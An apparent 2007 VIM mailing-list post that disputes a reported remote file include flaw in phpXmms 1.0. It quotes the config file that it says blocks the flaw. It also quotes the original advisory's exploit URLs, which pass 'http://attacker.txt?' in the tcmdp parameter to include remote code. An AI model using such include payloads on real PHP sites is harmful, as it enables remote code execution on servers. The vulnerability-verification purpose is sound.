[VIM] false: phpXmms 1.0 (tcmdp) Remote File Include Vulnerabilities
str0ke
str0ke at milw0rm.com
Tue Feb 20 14:09:20 EST 2007
the config.php file contains the below which pretty much blocks a rfi.
<?
$nprog = "phpxmms";
$ntheme = "ultrafina"; # theme name
$alink = "#738db4"; # playlist link colour
$tcmdp = "smmxphp.php";
$ttopp = "phpxmmst.php";
$tmidp = "phpxmmsm.php";
$tbotp = "phpxmmsb.php";
$precmd = "xmms-shell -e";
$predir = "/mp3"; # mp3 directory
$tuser = "user"; # user running XMMS
$thost = "localhost"; # box running XMMS
$tlist = "/tmp/toons.m3u";
$tldir = "/tmp/toons.dir";
$tclean = "2> /dev/null";
?>
-------------------------------------------------------------------------------------------------------------------
AYYILDIZ.ORG PreSents...
Script: phpXmms 1.0
Script Download: ftp://ftp.warpedsystems.sk.ca/pub/php/phpxmms-1.0.tar.gz
Contact: ilker Kandemir <ilkerkandemir[at]mynet.com>
Code:
include($tcmdp);
-------------------------------------------------------------------------------------------------------------------
Exploit: phpxmmsb.php?tcmdp=http://attacker.txt?
phpxmmst.php?tcmdp=http://attacker.txt?
-------------------------------------------------------------------------------------------------------------------
Tnx:H0tturk,Asianeagle,ajann,Str0ke .
Special Tnx: AYYILDIZ.ORG
More information about the VIM
mailing list